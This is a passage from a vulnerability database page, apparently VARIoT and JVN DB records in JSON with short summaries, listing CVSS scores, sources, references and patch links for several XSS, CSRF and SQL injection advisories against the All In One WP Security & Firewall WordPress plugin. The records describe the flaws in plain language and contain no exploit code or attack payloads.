                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2016-10866",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-89685",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2016-10866",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-10866",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-10866",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201908-883",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-89685",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2016-10866",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The all-in-one-wp-security-and-firewall plugin before 4.2.0 for WordPress has multiple XSS issues. WordPress for all-in-one-wp-security-and-firewall The plug-in contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-10866",
            "trust": 2.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-89685",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "id": "VAR-201908-1123",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-11-23T21:52:00.233000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "title": "WordPress all-in-one-wp-security-and-firewall Fixes for plugin cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96572"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/#developers"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10866"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10866"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "date": "2019-08-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "date": "2019-08-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "date": "2019-08-13T18:15:11.527000",
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-89685"
          },
          {
            "date": "2019-08-15T00:00:00",
            "db": "VULMON",
            "id": "CVE-2016-10866"
          },
          {
            "date": "2019-08-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          },
          {
            "date": "2019-08-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          },
          {
            "date": "2024-11-21T02:44:56.500000",
            "db": "NVD",
            "id": "CVE-2016-10866"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "WordPress for  all-in-one-wp-security-and-firewall Plug-in vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-007638"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201908-883"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202205-0286

    Vulnerability from variot - Updated: 2024-08-14 15:42

    The All In One WP Security & Firewall WordPress plugin before 4.4.11 does not validate, sanitise and escape the redirect_to parameter before using it to redirect user, either via a Location header, or meta url attribute, when the Rename Login Page is active, which could lead to an Arbitrary Redirect as well as Cross-Site Scripting issue. Exploitation of this issue requires the Login Page URL value to be known, which should be hard to guess, reducing the risk. All In One WP Security & Firewall WordPress A cross-site scripting vulnerability exists in the plugin.Information may be obtained and information may be tampered with. Both WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. A WordPress plugin is an application plugin. The redirect_to parameter is defined, an attacker can exploit this vulnerability to execute JavaScript code on the client

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202205-0286",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wp security \\\u0026 firewall",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "tipsandtricks hq",
            "version": "4.4.11"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": null
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "4.4.11"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "cve": "CVE-2021-25102",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "HIGH",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 2.6,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 4.9,
                "id": "CVE-2021-25102",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.9,
                "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "HIGH",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 2.6,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 4.9,
                "id": "VHN-383823",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:H/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.7,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.6,
                "id": "CVE-2021-25102",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.7,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-25102",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-25102",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-25102",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202205-1900",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-383823",
                "trust": 0.1,
                "value": "LOW"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-25102",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The All In One WP Security \u0026 Firewall WordPress plugin before 4.4.11 does not validate, sanitise and escape the redirect_to parameter before using it to redirect user, either via a Location header, or meta url attribute, when the Rename Login Page is active, which could lead to an Arbitrary Redirect as well as Cross-Site Scripting issue. Exploitation of this issue requires the Login Page URL value to be known, which should be hard to guess, reducing the risk. All In One WP Security \u0026 Firewall WordPress A cross-site scripting vulnerability exists in the plugin.Information may be obtained and information may be tampered with. Both WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. A WordPress plugin is an application plugin. The redirect_to parameter is defined, an attacker can exploit this vulnerability to execute JavaScript code on the client",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-25102",
            "trust": 3.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-59805",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-383823",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "id": "VAR-202205-0286",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-08-14T15:42:25.989000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All-In-One\u00a0Security\u00a0(AIOS)\u00a0-\u00a0Security\u00a0and\u00a0Firewall",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/"
          },
          {
            "title": "WordPress plugin All In One WP Security \u0026 Firewall Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=191234"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://wpscan.com/vulnerability/9b8a00a6-622b-4309-bbbf-fe2c7fc9f8b6"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25102"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2021-25102/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "date": "2022-05-02T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "date": "2023-08-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "date": "2022-05-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "date": "2022-05-02T16:15:08.093000",
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-383823"
          },
          {
            "date": "2022-05-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-25102"
          },
          {
            "date": "2023-08-14T06:05:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          },
          {
            "date": "2022-05-11T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          },
          {
            "date": "2022-05-10T13:14:58.547000",
            "db": "NVD",
            "id": "CVE-2021-25102"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All\u00a0In\u00a0One\u00a0WP\u00a0Security\u00a0\u0026\u00a0Firewall\u00a0WordPress\u00a0 Cross-site scripting vulnerability in plugins",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-010251"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-1900"
          }
        ],
        "trust": 0.6
      }
    }

    JVNDB-2015-000038

    Vulnerability from jvndb - Published: 2015-03-06 13:46 - Updated:2015-03-11 17:42
    Severity
    N/A (UNKNOWN) - -
    Summary
    All In One WP Security & Firewall vulnerable to cross-site request forgery
    Details
    All In One WP Security & Firewall is WordPress plugin that provides security functionality. All In One WP Security & Firewall contains a cross-site request forgery vulnerability (CWE-352).
    Show details on JVN DB website

    {
      "@rdf:about": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000038.html",
      "dc:date": "2015-03-11T17:42+09:00",
      "dcterms:issued": "2015-03-06T13:46+09:00",
      "dcterms:modified": "2015-03-11T17:42+09:00",
      "description": "All In One WP Security \u0026 Firewall is WordPress plugin that provides security functionality. All In One WP Security \u0026 Firewall contains a cross-site request forgery vulnerability (CWE-352).",
      "link": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000038.html",
      "sec:cpe": {
        "#text": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
        "@product": "All In One WP Security \u0026 Firewall",
        "@vendor": "Tips and Tricks HQ",
        "@version": "2.2"
      },
      "sec:cvss": {
        "@score": "2.6",
        "@severity": "Low",
        "@type": "Base",
        "@vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
        "@version": "2.0"
      },
      "sec:identifier": "JVNDB-2015-000038",
      "sec:references": [
        {
          "#text": "http://jvn.jp/en/jp/JVN87204433/index.html",
          "@id": "JVN#87204433",
          "@source": "JVN"
        },
        {
          "#text": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0895",
          "@id": "CVE-2015-0895",
          "@source": "CVE"
        },
        {
          "#text": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0895",
          "@id": "CVE-2015-0895",
          "@source": "NVD"
        },
        {
          "#text": "https://www.ipa.go.jp/en/security/vulnerabilities/cwe.html",
          "@id": "CWE-352",
          "@title": "Cross-Site Request Forgery(CWE-352)"
        }
      ],
      "title": "All In One WP Security \u0026 Firewall vulnerable to cross-site request forgery"
    }

    JVNDB-2015-000037

    Vulnerability from jvndb - Published: 2015-03-06 13:45 - Updated:2015-03-11 17:55
    Severity
    N/A (UNKNOWN) - -
    Summary
    All In One WP Security & Firewall vulnerable to SQL injection
    Details
    All In One WP Security & Firewall is WordPress plugin that provides security functionality. All In One WP Security & Firewall contains a SQL injection vulnerability (CWE-89). ooooooo_q reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.
    Show details on JVN DB website

    {
      "@rdf:about": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000037.html",
      "dc:date": "2015-03-11T17:55+09:00",
      "dcterms:issued": "2015-03-06T13:45+09:00",
      "dcterms:modified": "2015-03-11T17:55+09:00",
      "description": "All In One WP Security \u0026 Firewall is WordPress plugin that provides security functionality. All In One WP Security \u0026 Firewall contains a SQL injection vulnerability (CWE-89).\r\n\r\nooooooo_q reported this vulnerability to IPA.\r\nJPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.",
      "link": "https://jvndb.jvn.jp/en/contents/2015/JVNDB-2015-000037.html",
      "sec:cpe": {
        "#text": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
        "@product": "All In One WP Security \u0026 Firewall",
        "@vendor": "Tips and Tricks HQ",
        "@version": "2.2"
      },
      "sec:cvss": {
        "@score": "5.1",
        "@severity": "Medium",
        "@type": "Base",
        "@vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
        "@version": "2.0"
      },
      "sec:identifier": "JVNDB-2015-000037",
      "sec:references": [
        {
          "#text": "http://jvn.jp/en/jp/JVN30832515/index.html",
          "@id": "JVN#30832515",
          "@source": "JVN"
        },
        {
          "#text": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0894",
          "@id": "CVE-2015-0894",
          "@source": "CVE"
        },
        {
          "#text": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0894",
          "@id": "CVE-2015-0894",
          "@source": "NVD"
        },
        {
